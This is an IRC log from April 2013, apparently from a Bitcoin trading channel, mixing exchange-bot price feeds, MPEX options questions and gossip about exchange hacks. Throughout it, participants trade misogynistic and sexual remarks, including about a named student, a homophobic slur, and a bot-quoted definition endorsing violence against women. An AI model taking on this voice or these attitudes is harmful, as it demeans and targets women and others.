we don't escrow Apr 26 03:48:53 it's person-to-person Apr 26 03:49:13 where are te collateral coins stored? Apr 26 03:49:19 well, i really feel that something like nashx needs to exist for everyone's benefit Apr 26 03:49:40 what collateral? there's no need Apr 26 03:49:49 maybe i need to read it better Apr 26 03:49:57 yeah i think so... :) Apr 26 03:50:20 sure Apr 26 03:50:25 my first name is seong yup Apr 26 03:50:27 https://bitcointalk.org/index.php?topic=154089.msg1946133#msg1946133 lol Apr 26 03:50:28 last name is yoo Apr 26 03:51:21 Bitcoin has a mechanism for multisig transactions - destruction isn't necessary Apr 26 03:51:30 https://blockchain.info/wallet/escrow Apr 26 03:52:00 [HAVELOCK] [SDICE] 1 @ 0.27500001 BTC [-] Apr 26 03:52:29 unless I've misunderstood what you're trying to do Apr 26 03:53:50 alrighty, i'm off. cya tomorro. **** BEGIN LOGGING AT Fri Apr 26 12:37:27 2013 Apr 26 12:45:49 [BTCTC] [RSM] 1 @ 0.00302 BTC [-] Apr 26 12:46:56 asciilifeform you'll have to one day sit down and write a full explanation as to why a. you think the us government matters at all and b. you think anyone other than you gives a shit. Apr 26 12:47:03 [HAVELOCK] [HIM] 4 @ 1.7051 = 6.8204 BTC [-] Apr 26 12:47:11 but i mean, a serious, explicit, inquisitive piece like if you were writing a physics paper. Apr 26 12:48:39 what is it down Apr 26 12:50:17 i thought mp said "like writing a physics engine" Apr 26 12:54:14 lol Apr 26 12:55:05 it's kinda funny tho because unique among literate people americans have spent a century or maybe even two in the firm belief that their government is like... good etc. paying their taxes, trying to do what policeman says etc. Apr 26 12:55:24 this is a strictly american phenomenon, unheard of anywhere else, from france to morocco and from russia to iran Apr 26 12:59:54 ;;later tell benkay is ok now Apr 26 12:59:54 The operation succeeded. Apr 26 13:04:50 http://polimedia.us/dtng/c/src/134295962723.jpg Apr 26 13:06:43 jurov i dont remember what i found it Apr 26 13:06:50 but unix timestamp ftw Apr 26 13:14:25 what the fuck is wrong with people who make public policy? Apr 26 13:15:15 instead of actually just letting them pay the price that they say they would pay, we take the word for it and set a rate? how does that make any sense Apr 26 13:15:26 apparently the swaps market is also rigged like LIBOR Apr 26 13:15:37 duh. Apr 26 13:15:50 well, that is not surprising Apr 26 13:16:03 but i just can't believe that no one actually does anything about it Apr 26 13:16:08 http://bitbet.us/bet/329/btc-network-difficulty-tops-10-million-by-end/ funny how disputed this one ended up being. Apr 26 13:16:31 somehow magically the bet submitter picked the exact spot where it'd be contentious. Apr 26 13:16:49 like...if i went to the supermarket, and they did a survey asking everyone there how much an orange would cost me...instead of letting us just bid on the orange or w/e Apr 26 13:17:00 but this is more democratic. Apr 26 13:17:12 and less capitalistic. Apr 26 13:17:33 both these are good things. especially for people who need beatings, know they need beatings, want to get their ass beaten raw. Apr 26 13:17:54 lol Apr 26 13:18:03 its also funny cuz they are really DP'ing everyone Apr 26 13:18:14 let's cheat and fix the interest rate... Apr 26 13:18:33 and then let's cheat and fix the price it takes to switch from variable to fixed rate Apr 26 13:18:39 then people want banks to like bitcoin Apr 26 13:18:46 how many other ways can you add corruption to a loan Apr 26 13:19:00 yes dude, totally. they'll love bitcoin, where they have to come to me with that nonsense and be shown the door Apr 26 13:19:05 they love this idea, pls moar. Apr 26 13:19:39 well..."banks" is not a great word...there are banks and then there are banks Apr 26 13:19:53 its not a monolithic structure... Apr 26 13:20:02 this is very true. Apr 26 13:20:15 but, once you are in the club, then you have no worries Apr 26 13:20:25 on the other hand, i'm already buffing my cameras and mics for that glorious moment five or maybe three years down the road Apr 26 13:20:31 hehehe Apr 26 13:20:35 gonna be fun Apr 26 13:20:37 when random anon bank ceo/vp/etc comes to bitcoin assets to start w/e project Apr 26 13:20:42 and i go are you in the wot ? gtfo. Apr 26 13:21:04 come back 1 yr. Apr 26 13:21:11 hehe Apr 26 13:21:15 we all dreamin. Apr 26 13:21:24 and he's gonna be all whiny and i'm gonna be all dude, we've had this interdweeb nonsense for 3 or 5 years by now. Apr 26 13:21:28 stfu and do whart you're told. Apr 26 13:21:54 and so he's going to dig up the old protest threads on btctalk and bitch about how im a gypsy racist Apr 26 13:22:02 and then our victory will have been complete. Apr 26 13:22:09 lol Apr 26 13:22:29 now don't any of you trolls quote this discussion then until after i'm done making teh banker my cockpuppet. Apr 26 13:22:31 hehehe Apr 26 13:22:44 ewwww, you want a banker for a cockpuppet? Apr 26 13:22:51 metaphorically speaking. Apr 26 13:22:52 lol Apr 26 13:22:56 i know of course Apr 26 13:22:59 i have a 10 foot cock, i can stick it into banker Apr 26 13:23:00 a little Apr 26 13:23:01 at the tip Apr 26 13:23:46 speaking of bankers, anyone have any favorite burlesque performers ? Apr 26 13:23:59 i'm going to do like l'oreal etc and have a mpex image chick. Apr 26 13:25:42 this is why I have logging turned on Apr 26 13:25:55 HAHAHA Apr 26 13:25:56 :D Apr 26 13:25:56 yes Apr 26 13:26:07 are we going to have the website to archive all of this? Apr 26 13:26:19 yep Apr 26 13:26:21 hmmm...what if we put everything from bitcoin-assets into the blockchain? Apr 26 13:26:28 no, bad idea Apr 26 13:26:31 blockchain is too big already Apr 26 13:26:38 how future generations will judge us... Apr 26 13:26:44 in fact this chan is growing faster than the blockchain Apr 26 13:26:44 i was trying to add it like yesterday or something but i got distracted Apr 26 13:26:47 we don't want everyone dropping their crap in the blockchain Apr 26 13:27:15 irc is to blame Apr 26 13:27:30 scam. Apr 26 13:27:37 i think it'd be hilarious, kinda like putting up posters of miley cyrus in the smithsonian Apr 26 13:27:48 MJR_ they've put seinfeld. Apr 26 13:27:49 or doodling on the constitution Apr 26 13:28:02 lol Apr 26 13:28:08 and in fairness, the blockchain isn't as bad as either miley cyrus or doodling. Apr 26 13:28:12 we could tolerate it on our chan Apr 26 13:28:26 i just think that the whole idea of posterity is going away rather quickly Apr 26 13:28:45 we still have the illusion (some of us anyway) that the older generations were respectable Apr 26 13:28:55 our children will prob not have that illusion at all Apr 26 13:29:05 loool Apr 26 13:29:22 MJR_ is worried. Apr 26 13:30:12 srsly Apr 26 13:30:28 when your kids can google the things you tweeted as a teenager yourself... Apr 26 13:30:29 o hey, twitter delivers! >> @PaulFish This is what a CEO / founder needs to focus on. This is it. http://t.co/KopwO3Udpy Apr 26 13:30:40 or even worse, if they see the pics you've posted of yourself Apr 26 13:30:41 then people wonder why i have the time to irc and chase skirts. Apr 26 13:31:03 MJR_ i think all future children will have to learn to be comfortable with the fact that their mother's goodies are public record. Apr 26 13:31:31 yep Apr 26 13:38:00 mircea_popescu: it's kinda funny tho because unique among literate people americans have spent a century or maybe even two in the firm belief that their government is like... good etc. paying their taxes, trying to do what policeman says etc. << I would attribute that to the general populace being brainwashed into believing revolution is bad Apr 26 13:38:14 are you kidding ? Apr 26 13:38:19 it all started with revolution. Apr 26 13:38:36 pretty much the only people who believe revolution is good, other than romanians and who knows who else. Apr 26 13:38:37 isn't that funny though?!?!? Apr 26 13:38:40 kinda Apr 26 13:39:19 Sure we protest, and "get uppity", but in general you're taught all through childhood "do as your told", "don't question authority". Apr 26 13:40:27 Maybe if everyone were more poor? Or perhaps there was truly a need to revolt? American's are very apathetic, and actually seem to "enjoy" the lethargy that arises from it. Apr 26 13:40:29 that's normal, good and common. Apr 26 13:40:45 people should do what they're told and not question authority in most cases. Apr 26 13:41:03 People should not be lazy and educate themselves :P Apr 26 13:41:09 that's also Apr 26 13:41:24 but the society where people don't do what they're told and question authority a lot ends up something like france Apr 26 13:41:40 can't get a fucking train on schedule, even if the schedule lists hours only, no minutes. Apr 26 13:42:24 Yea, or you get Detroit. Apr 26 13:42:29 Have you ever been to Detroit? Apr 26 13:43:13 i've been to detroit Apr 26 13:43:31 i avoided it. Apr 26 13:43:35 I think mircea_popescu would very well enjoy Detroit. Apr 26 13:43:55 You may need quite a few goons, and maybe a couple of drones... Apr 26 13:45:04 you think ? Apr 26 13:45:06 why ? Apr 26 13:45:33 Dude you survive in Bitcoin land which is like the virtual Detroit. Apr 26 13:45:41 Not only survive but thrive off it. Apr 26 13:45:52 Detroit is yours for the taking I'd think. Apr 26 13:46:07 You lived through the 90's Romanian revolution no? Apr 26 13:46:12 yea... Apr 26 13:46:35 what, i'm not affraid of "bad neighbourhoods" lol. Apr 26 13:47:06 heck, i took teh coindelberg group through one here, it was funnay. Apr 26 13:47:40 is that like a pun? Apr 26 13:48:12 which one ? Apr 26 13:48:18 coindelberg Apr 26 13:48:19 lol Apr 26 13:48:30 lol. Apr 26 13:48:36 the endlessly hacked frenchie guy came up with it Apr 26 13:48:48 Aw. And you were rooting for him. Apr 26 13:49:03 myeah. Apr 26 13:49:12 he has the luck of the irishman in reverse. Apr 26 13:50:09 I wonder how they keep getting in... Apr 26 13:51:02 *that* was bad neighborhood? i failed to notice. no smell, hens or pigs Apr 26 13:51:09 [MPEX] [S.MPOE] 6100 @ 0.00069657 = 4.2491 BTC [+] Apr 26 13:51:34 jurov's been to detroit? Apr 26 13:51:46 no, in bratislava Apr 26 13:51:48 jurov didja notice the gagle of 20 kids threatening to knife each other ? Apr 26 13:52:27 yes i noticed, just joking a bit Apr 26 13:53:19 was kinda funny, they were all "you ciocksucker, i bet you don't have 10 euros on you" "dude, if i do you suck my cock ???" "fuck you, show me" Apr 26 13:53:46 i was like, hey, cool, nobody here is worth less than a million or some shit like that, you people are arguing about who has ten euros. Apr 26 13:54:03 inequality ftw. Apr 26 13:54:17 srsly, we need them in -otc. complete with knives Apr 26 13:56:24 ;;ticker Apr 26 13:56:26 BTCUSD ticker | Best bid: 129.98000, Best ask: 130.00000, Bid-ask spread: 0.02000, Last trade: 130.00000, 24 hour volume: 240970.80932549, 24 hour low: 120.08900, 24 hour high: 159.66165, 24 hour vwap: 137.00610 Apr 26 13:57:03 50 here we come! Apr 26 13:57:14 lol Apr 26 13:57:24 ;;bids 125 Apr 26 13:57:27 There are currently 3217.5402 bitcoins demanded at or over 125.0 USD, worth 406095.036857 USD in total. | Data vintage: 0.0053 seconds Apr 26 13:57:34 ;;asks 140 Apr 26 13:57:34 There are currently 7155.5675 bitcoins offered at or under 140.0 USD, worth 974221.764505 USD in total. | Data vintage: 7.8159 seconds Apr 26 13:58:06 ;;bids 120 Apr 26 13:58:07 There are currently 18144.077 bitcoins demanded at or over 120.0 USD, worth 2216699.76409 USD in total. | Data vintage: 40.3246 seconds Apr 26 13:59:43 lol coindelberg? Apr 26 14:02:37 totally. Apr 26 14:03:18 all hail our Lord deCrypto Apr 26 14:03:35 http://www.reddit.com/r/deCrypto/ (nsfw) Apr 26 14:04:11 kinda old this neh ? Apr 26 14:04:11 yay "This subreddit has been slow, as have my mining operations. I thought I'd freshen it up a bit!" Apr 26 14:04:40 old but good Apr 26 14:06:08 lol good morning truffles Apr 26 14:15:36 trrrrrrufflesss? Apr 26 14:16:06 *wink* Apr 26 14:16:27 so you had to be helpful. Apr 26 14:16:46 lol, have you guys heard of rebecca martinson Apr 26 14:16:50 truffles your kids will see that. Apr 26 14:17:16 i need help, too Apr 26 14:17:45 https://bitcointalk.org/index.php?topic=188178.0 Apr 26 14:17:51 seems btc-e was actuyally hacked last week ? Apr 26 14:18:05 and we are back on topic Apr 26 14:18:07 what, is truffles posting nudes ? Apr 26 14:18:08 http://gawker.com/5994974/the-most-deranged-sorority-girl-email-you-will-ever-read?popular=true Apr 26 14:18:16 this is why i love american colleges Apr 26 14:19:03 [UPDATE 4/25: The sorority sister who authored the email has now resigned. Click here to read the sorority's official statement.] Apr 26 14:19:07 see, this sorty of shit... Apr 26 14:19:22 i would have made her chapter queen for a week, and everyone had to serve her in the nude. Apr 26 14:21:01 she is awesome Apr 26 14:21:15 she basically is implying that the other girls should have put out more for social status Apr 26 14:21:49 yep Apr 26 14:21:53 do you know a name or anything ? Apr 26 14:21:56 i'm inviting her over. Apr 26 14:24:37 rebecca martinson Apr 26 14:24:57 my friend sent me that, i just asked one question...is she single Apr 26 14:25:11 http://www.betcheslovethis.com/article/50-shades-of-just-okay Apr 26 14:25:18 i dojn't give a flying fuck if she;s single. and tyvm. Apr 26 14:27:00 the email doesnt seem that controversial, i expected worse from the hype Apr 26 14:28:33 http://www.betcheslovethis.com/article/Themed-Parties Apr 26 14:28:49 this one is great, sororities hobos and hoes theme parties Apr 26 14:28:58 and people say america doesn't have a great educational system... Apr 26 14:29:51 some dumb parents right there Apr 26 14:33:44 lol, but...skateboards? Apr 26 14:35:04 [HAVELOCK] [SDICE] 1 @ 0.29999998 BTC [+] Apr 26 14:38:59 ;;ud betch Apr 26 14:38:59 http://www.urbandictionary.com/define.php?term=betch | A betch is another way of saying "Bitch" except it sounds a million times better and makes you feel cool! Apr 26 14:42:47 http://www.studentorg.umd.edu/ Apr 26 14:42:49 check that out lol Apr 26 14:43:22 are college sororities/fraternities only a murcan thing? or do other western countries have them Apr 26 14:44:01 pretty much american Apr 26 14:45:00 ;;bc,stats Apr 26 14:45:04 Current Blocks: 233241 | Current Difficulty: 8974296.01488785 | Next Difficulty At Block: 233855 | Next Difficulty In: 614 blocks | Next Difficulty In About: 3 days, 8 hours, 58 minutes, and 1 second | Next Difficulty Estimate: 9956757.41042 | Estimated Percent Change: 10.9475 Apr 26 14:45:20 so close to 10mil Apr 26 14:46:20 21 Apr 26 14:46:44 ya well its a scam! Apr 26 14:47:44 lol Apr 26 14:54:45 ;;ud cuntpunt Apr 26 14:54:46 http://www.urbandictionary.com/define.php?term=cunt-punt | if a bitch/ minion gets wise with you, you kick and or punch them in their pussy. gets em everytime. If you talk back to me one more time, ill give ya a cunt punt, ... Apr 26 15:15:15 [MPEX] [S.DICE] 309 @ 0.00278789 = 0.8615 BTC [-] Apr 26 15:17:03 [HAVELOCK] [SDICE] 2 @ 0.28000001 = 0.56 BTC [-] Apr 26 15:20:17 "And how do you know that none of the content was written by people behind it? (And even if it was not written, it was perfectly collected together.)The organization is 100% anonymous with bitcoin early developers and great programmers behind it. Satoshi Nakamoto, before he vanished, in the last interview in April said that he had "moved on to other things," how do you know that GBBG and their software is not that oth Apr 26 15:20:17 er thing." Apr 26 15:20:20 comedy gold. Apr 26 15:23:18 mp: what is that in reference to? Apr 26 15:24:20 https://bitcointalk.org/index.php?topic=154089.msg1949434#msg1949434 Apr 26 15:27:50 [MPEX] [S.MPOE] 4754 @ 0.00069657 = 3.3115 BTC [+] Apr 26 15:27:52 [MPEX] [S.MPOE] 15996 @ 0.00069481 = 11.1142 BTC [-] Apr 26 15:36:48 https://bitcointalk.org/index.php?topic=99497.msg1950787#msg1950787 friedcat update Apr 26 15:40:09 thanks Apr 26 15:40:34 doubling in a week is pretty good Apr 26 15:40:41 wish it was more however Apr 26 15:42:11 138 again on btc, fucking all over the place Apr 26 15:42:17 120 to 166 range is nuts... Apr 26 15:42:32 ;;bids 120 Apr 26 15:42:34 There are currently 22399.07 bitcoins demanded at or over 120.0 USD, worth 2772336.48921 USD in total. | Data vintage: 0.0060 seconds Apr 26 15:42:42 ;;asks 166 Apr 26 15:42:43 There are currently 33114.795 bitcoins offered at or under 166.0 USD, worth 5071504.2059 USD in total. | Data vintage: 8.3661 seconds Apr 26 15:43:14 hmm Apr 26 15:43:19 ;;bids 0 Apr 26 15:43:20 There are currently 33503993 bitcoins demanded at or over 0.0 USD, worth 19202524.8757 USD in total. | Data vintage: 44.8066 seconds Apr 26 15:43:26 down a bit... Apr 26 15:47:19 [MPEX] [S.MPOE] 9650 @ 0.00070059 = 6.7607 BTC [+] Apr 26 15:51:15 [MPEX] [S.DICE] 1000 @ 0.00278789 = 2.7879 BTC [-] Apr 26 15:53:04 [HAVELOCK] [SDICE] 10 @ 0.28 = 2.8 BTC [-] Apr 26 15:54:31 ;;next Apr 26 15:54:32 \*AWAY UNTIL April 28\* resistance: 132, 136, 138-140 | support: 120, 115, 110, 100, 90 | lower buy targets: 102, 96-100, 86 | updated by OneFixt at Apr 21 2013, 18:00 UTC ( tips: http://bit.ly/YnxUM4 ) | disclaimer: http://bit.ly/129bYJ6 | this is not investment or trading advice | #bitcoin-analysis | 4 days, 18 hours, 54 minutes, and 28 seconds ago Apr 26 16:16:14 where I can read more about what exactly mean for example O.USD.C152N? Apr 26 16:17:23 oddly i dont think there is a good description faq for mpex options on the mpex website Apr 26 16:17:36 but i know full explanations exists in the forums Apr 26 16:18:45 Cylta call struck at 152 expiring next month Apr 26 16:21:03 MP blog no ? for a good description Apr 26 16:26:55 error4733 i thought they're explained to death everywhere, forum, blog etc. Apr 26 16:27:52 [BTCTC] [ASICMINER-PT] 1 @ 1.1629 BTC [+] Apr 26 16:28:06 [BTCTC] [RSM] 1 @ 0.00303 BTC [+] Apr 26 16:28:35 yes but not on MPEX #irony Apr 26 16:30:21 lol Apr 26 16:32:05 Very funny mircea popescu..Can I have my anal room back please Apr 26 16:32:26 why would you want bitcoin anal Apr 26 16:32:45 I'm not trying to be an ass Apr 26 16:33:07 Thats ok..I'll get it in the end Apr 26 16:33:26 wait what ?! Apr 26 16:33:42 Says you registered my anal chat Apr 26 16:34:08 Can I have my anal chat room back pls Apr 26 16:34:19 lol Apr 26 16:34:27 i have ?! Apr 26 16:34:32 [Notice] -ChanServ- #bitcoin-anal is already registered to mircea_popescu. Apr 26 16:34:44 Isnt anything sacred anymore Apr 26 16:34:44 lol Apr 26 16:34:56 whoa Apr 26 16:35:01 kickass. Apr 26 16:36:17 haha its a nice channel though Apr 26 16:36:17 [BTCTC] [ASICMINER-PT] 2 @ 1.163 = 2.326 BTC [+] Apr 26 16:37:03 [BTCTC] [ASICMINER-PT] 7 @ 1.1638 = 8.1466 BTC [+] Apr 26 16:37:59 [BTCTC] [ASICMINER-PT] 1 @ 1.1635 BTC [-] Apr 26 16:40:30 you jacked #bitcoin-anal?? Apr 26 16:40:41 [BTCTC] [ASICMINER-PT] 1 @ 1.1637 BTC [+] Apr 26 16:42:46 If I understand correctly, asset "O.USD.C086T" is a call option from price of 86 usd per btc that will expire this month. Why people sell it, if price is already significally higher? and for what amount is this option? Apr 26 16:43:26 Cylta, you need to wait until new options are created tonight/tomorrow Apr 26 16:43:35 current prices are "glitched" Apr 26 16:43:46 (not actually quoting anyone) Apr 26 16:43:59 Cylta you understand how options work, do you ? Apr 26 16:44:18 he was looking for a full guide earlier Apr 26 16:44:26 i dont have the link saved tho Apr 26 16:45:01 you should post that shit at mpex.com Apr 26 16:45:04 .co* Apr 26 16:45:26 mircea_popescu: I did not expect, that you can buy\sell options with different price than current price. that's looks strange for me. Apr 26 16:46:37 http://trilema.com/2013/mpex-btc-usd-options-denomination-change/ Apr 26 16:46:53 [BTCTC] [ASICMINER-PT] 1 @ 1.1637 BTC [+] Apr 26 16:47:25 http://daytrading.about.com/od/daytradingglossary/g/OptionsCallPut.htm Apr 26 16:48:01 error4733: thanks! Apr 26 16:48:22 neither of those links will help you enough Apr 26 16:48:23 Cylta https://bitcointalk.org/index.php?topic=67302.0 Apr 26 16:48:26 the price is not different, it's a like a bet ! Apr 26 16:48:26 prolly should start there. Apr 26 16:48:41 thats the good one! Apr 26 16:49:17 would you consider adding that link to the mpex faq? Apr 26 16:50:16 well the idea kinda is that the mpex faq is about mpex, and people should be learning about options other places. Apr 26 16:50:49 $acg Apr 26 16:50:53 $avg Apr 26 16:50:55 deadweasel: 135.85 Apr 26 16:51:39 crap. hey mp, does the bot come online to buy back my calls at a fraction of the price I bought them for? Apr 26 16:52:09 asking mp for something = always asking too much Apr 26 16:52:22 answers are usually rec'd. Apr 26 16:52:28 which is something. Apr 26 16:52:36 "for" Apr 26 16:53:01 he will speak to you, just not act for you Apr 26 16:53:04 we'll see. Apr 26 16:53:11 [BTCTC] [ASICMINER-PT] 1 @ 1.1637 BTC [+] Apr 26 16:53:13 all i want is an answer Apr 26 16:53:33 unless you want to buy some calls at 215 ThickAsThieves ! : Apr 26 16:53:38 :D Apr 26 16:54:03 already burdened with Put at 89 Apr 26 16:54:07 Puts* Apr 26 16:54:28 ouchie, should exercised them demons... i did the avg ever come down that far? Apr 26 16:54:32 and calls the mysteriously excercised at 0 Apr 26 16:54:35 or was the 50 bounce too quick? Apr 26 16:54:50 [BTCTC] [S.MPOE-PT] 150 @ 0.000641 = 0.0962 BTC [-] Apr 26 16:55:02 [BTCTC] [S.MPOE-PT] 100 @ 0.00064 = 0.064 BTC [-] Apr 26 16:55:40 [BTCTC] [BTC-BOND] 5 @ 0.00983 = 0.0492 BTC [-] Apr 26 16:55:43 [BTCTC] [BTC-BOND] 1 @ 0.00983 BTC [-] Apr 26 16:55:49 [BTCTC] [BTC-BOND] 8 @ 0.00982 = 0.0786 BTC [-] Apr 26 16:55:51 [BTCTC] [S.MPOE-PT] 9 @ 0.000639 = 0.0058 BTC [-] Apr 26 16:55:56 [BTCTC] [BTC-BOND] 15 @ 0.00981 = 0.1472 BTC [-] Apr 26 16:55:58 [BTCTC] [S.MPOE-PT] 30 @ 0.000635 = 0.0191 BTC [-] Apr 26 16:56:10 [BTCTC] [S.MPOE-PT] 10 @ 0.000631 = 0.0063 BTC [-] Apr 26 16:57:10 [BTCTC] [GSDPT] 30 @ 0.00281 = 0.0843 BTC [+] Apr 26 16:57:14 [BTCTC] [GSDPT] 1 @ 0.00281 BTC [+] Apr 26 16:57:17 [BTCTC] [GSDPT] 97 @ 0.0028 = 0.2716 BTC [-] Apr 26 16:57:38 [BTCTC] [GSDPT] 1 @ 0.0028 BTC [-] Apr 26 16:57:42 my MPOE PT shares seem to be being held hostage by DeadTerra, who is disinclined to trasnfer them to Jurov for me. Apr 26 16:58:20 lol, i sold EVERYTHING. I don't want to hold of any of that crap right now. Apr 26 16:58:25 did he said as much? or is he just silent? Apr 26 16:58:29 silent Apr 26 16:58:33 after several messages Apr 26 16:58:40 and sign-ons by him Apr 26 16:58:44 in forum Apr 26 16:59:36 maybe he's busy playing Starcraft or sumth Apr 26 17:00:01 i wouldnt trust a guy who plays xbox Apr 26 17:00:30 [BTCTC] [ASICMINER-PT] 3 @ 1.1638 = 3.4914 BTC [+] Apr 26 17:00:34 [BTCTC] [ASICMINER-PT] 1 @ 1.1649 BTC [+] Apr 26 17:00:47 AM is gonna rally again Apr 26 17:00:47 [BTCTC] [ASICMINER-PT] 10 @ 1.165 = 11.65 BTC [+] Apr 26 17:01:02 friedcat confirmed 15TH will be online within a week Apr 26 17:01:48 ok so who wants to or knows anyone wanting to model tits for a new project of mine ? Apr 26 17:02:14 MPOE-PR seems to be equipped Apr 26 17:03:00 im trying to spread bitcoin incomes to poor girls. Apr 26 17:03:05 she ain't poor. Apr 26 17:03:22 [BTCTC] [B.YABMC] 30 @ 0.01629 = 0.4887 BTC [+] Apr 26 17:03:47 [BTCTC] [S.MPOE-PT] 150 @ 0.000679 = 0.1019 BTC [+] Apr 26 17:05:16 Maybe reddit wants to help Apr 26 17:05:24 mircea_popescu: http://www.reddit.com/r/GirlsGoneBitcoin ? i think many of them may help you Apr 26 17:05:36 I'm a poor girls. Apr 26 17:05:43 a ty Apr 26 17:05:49 KRS-1 you female ? Apr 26 17:05:54 i can be Apr 26 17:06:08 how much btc we talkin here Apr 26 17:06:14 talk to goat, i don't do ladyboiz Apr 26 17:06:23 lulz Apr 26 17:06:52 ok i'll settle for ltc ...? Apr 26 17:07:02 nmc? Apr 26 17:07:15 KRS-1: may be xrp =) Apr 26 17:07:33 whats a xrp Apr 26 17:08:05 There are currently 165183.38 bitcoins demanded at or over 50.0 USD, worth 14103182.0003 USD in total. | Data vintage: 0.0086 seconds Apr 26 17:08:15 There are currently 69668.083 bitcoins offered at or under 200.0 USD, worth 11769976.7017 USD in total. | Data vintage: 9.4491 seconds Apr 26 17:08:26 KRS-1: premined, centrelised, low-value, with-no-future coin =) Apr 26 17:08:35 mircea_popescu: you could organize orgies in romania, get bitcoins spent, and poor girls richer Apr 26 17:08:58 o look who's back Apr 26 17:09:11 i think ima organise lockable cages webhosting first, frenchie :D Apr 26 17:09:17 lol Apr 26 17:09:20 [BTCTC] [BASIC-MINING] 14 @ 0.41 = 5.74 BTC [+] Apr 26 17:09:23 mircea_popescu: where do i sign? Apr 26 17:09:33 ovh.com/suckers-apply-here Apr 26 17:10:03 yeah well Apr 26 17:10:46 [BTCTC] [ASICMINER-PT] 1 @ 1.1978 BTC [+] Apr 26 17:10:49 so how's paris ? Apr 26 17:10:49 [BTCTC] [ASICMINER-PT] 1 @ 1.1979 BTC [+] Apr 26 17:10:59 being hit by the very thing you were discussing a couple of hours ago on #bitcoin-assets OH THE IRONY Apr 26 17:11:04 dirty as usual Apr 26 17:11:12 lol Apr 26 17:11:16 hi davout Apr 26 17:11:26 MJR_: hello Apr 26 17:11:44 whats new Apr 26 17:11:49 whats up MJR- Apr 26 17:12:47 MJR_: well. https://bitcoin-central.net pretty much sums it all up Apr 26 17:12:55 [BTCTC] [ASICMINER-PT] 1 @ 1.1979 BTC [+] Apr 26 17:13:04 [BTCTC] [ASICMINER-PT] 12 @ 1.198 = 14.376 BTC [+] Apr 26 17:14:13 i do think the idea to reaudit the entire thing leisurely is best. Apr 26 17:14:15 who came up with it ? Apr 26 17:15:32 mircea_popescu: the idea of re-auditing ? Apr 26 17:15:43 you know, take service down, check everything, no rush Apr 26 17:15:47 i did Apr 26 17:15:53 good call. Apr 26 17:16:29 my intelligence is limited, but i do have enough to see when taking a step back is needed Apr 26 17:16:32 :-) Apr 26 17:18:31 ;;getrating davout Apr 26 17:18:32 WARNING: Currently not authenticated. User davout, rated since Thu Jan 27 14:22:24 2011. Cumulative rating 14, from 4 total ratings. Received ratings: 4 positive, 0 negative. Sent ratings: 2 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=davout Apr 26 17:19:10 https://bitcointalk.org/index.php?topic=188353.0 here we go Apr 26 17:19:59 replied Apr 26 17:21:14 lol Apr 26 17:21:24 [BTCTC] [S.DICE-PT] 5 @ 0.003071 = 0.0154 BTC [-] Apr 26 17:21:25 how much resemblance necessary? Apr 26 17:21:29 but dunno how many topless models frequent irc.. maybe usagi will volunteer? Apr 26 17:21:40 https://bitcointalk.org/index.php?topic=174620.msg1950361#msg1950361 Apr 26 17:21:46 lol yeah Apr 26 17:22:02 also scroll up wtf? Apr 26 17:22:04 [BTCTC] [S.DICE-PT] 8 @ 0.00307 = 0.0246 BTC [-] Apr 26 17:22:23 who is the attention whore now Apr 26 17:22:59 [BTCTC] [COGNITIVE] 1 @ 0.17603 BTC [-] Apr 26 17:23:29 [BTCTC] [BTC-BOND] 6 @ 0.00981 = 0.0589 BTC [-] Apr 26 17:23:32 [BTCTC] [BTC-BOND] 4 @ 0.0098 = 0.0392 BTC [-] Apr 26 17:23:37 nice pic, rivals even MP's pics Apr 26 17:23:47 My burn rate is currently about $200,000 per month if I continue at this level Apr 26 17:23:59 mpoe-pr should comment how much women if mp's burn rate Apr 26 17:24:04 *is Apr 26 17:25:40 omg that thread Apr 26 17:25:51 it continiues into total retarded noobishness Apr 26 17:25:52 Hello :p Apr 26 17:25:59 B0g4r7 B0g4r7_ b0n1 beetlebee bgupta bitcoin_lady blacktape BTCOxygen bVector bycy Apr 26 17:26:01 heya bitcoin_lady Apr 26 17:26:05 :) Apr 26 17:26:14 this should be fun Apr 26 17:26:32 it it apropriate to say "tits or gtfo" ? Apr 26 17:27:08 This is not /b/, faggot. Apr 26 17:27:20 its a meta question, lady. Apr 26 17:27:38 haha cool. Apr 26 17:27:51 so this rpietila guy is trying to be me two years later basically ? Apr 26 17:28:02 bitcoin_lady to read your private messages click on the tab Apr 26 17:28:16 mircea_popescu i think he is a liar ... saying he was 'around' first bubbl Apr 26 17:28:17 e Apr 26 17:28:29 ya well. Apr 26 17:28:36 dunno Apr 26 17:28:38 people love pumping themselves up for w/e reason. Apr 26 17:30:11 i mean the guy sent 13 btc to some other guy Apr 26 17:30:14 to prove he is rich Apr 26 17:30:19 that only proves he is an idiot Apr 26 17:30:23 pretty much. Apr 26 17:30:38 ? Apr 26 17:30:47 i check the address on blockchain Apr 26 17:30:57 he didnt sent Apr 26 17:31:11 apparently was internal tx of easywallet Apr 26 17:31:18 i mean its that or he has two accounts Apr 26 17:31:22 and is self trolling Apr 26 17:31:23 lmao Apr 26 17:31:25 and so incapable Apr 26 17:31:26 what idiot. Apr 26 17:31:32 self trolling imo Apr 26 17:31:32 that he doesnt even do blockchain tx Apr 26 17:31:36 somebody drop a link to mpex's public addy, see what he says Apr 26 17:37:53 why people sell options above 1btc? looks like profit may not break the edge of 1btc per option. Apr 26 17:38:09 at lest for calls Apr 26 17:38:59 Cylta the bot is a little crazy currently. Apr 26 17:39:05 you can sell them for whatever you want tho. Apr 26 17:39:56 but by math, any calls that are sold for more, than 1 btc is just waiting of buyers money :P kind of math exam? Apr 26 17:40:38 kakobrekla that guy.. wtf was he thinking? Apr 26 17:40:48 he wasnt Apr 26 17:40:52 and isnt Apr 26 17:40:53 you know he has a party or gathering or something in finland? Apr 26 17:40:54 and wont be Apr 26 17:41:08 he asked me to go, and then asked for btc :/ Apr 26 17:41:15 omg Apr 26 17:41:21 how much Apr 26 17:41:41 i dont know, it goes up the longer i wait. but i guess there is hotel or something involved Apr 26 17:41:48 but there are no details that i can find Apr 26 17:42:14 im not going so i just sorta ignored it but then i saw this and was like wtf?? Apr 26 17:42:19 lol Apr 26 17:42:40 well this is bitcoin, everyone and their sister is the biggest expert Apr 26 17:42:52 and their dog Apr 26 17:43:12 yes, this is a dog. Apr 26 17:44:27 kako i cant tell if he is some silver hot shot invester who made money in the run up and now did well in btc in the last 4 months or is just a full scammer Apr 26 17:44:52 btw is he claiming to have 2.4k btc or 24k btc? Apr 26 17:45:07 i dont know Apr 26 17:45:13 he was buying at ~100 Apr 26 17:45:14 2.4k mbtc Apr 26 17:45:21 no i did very well in silver and then i did very well in btc/ltc and asicminer Apr 26 17:45:23 he's givind errythign in mbtc Apr 26 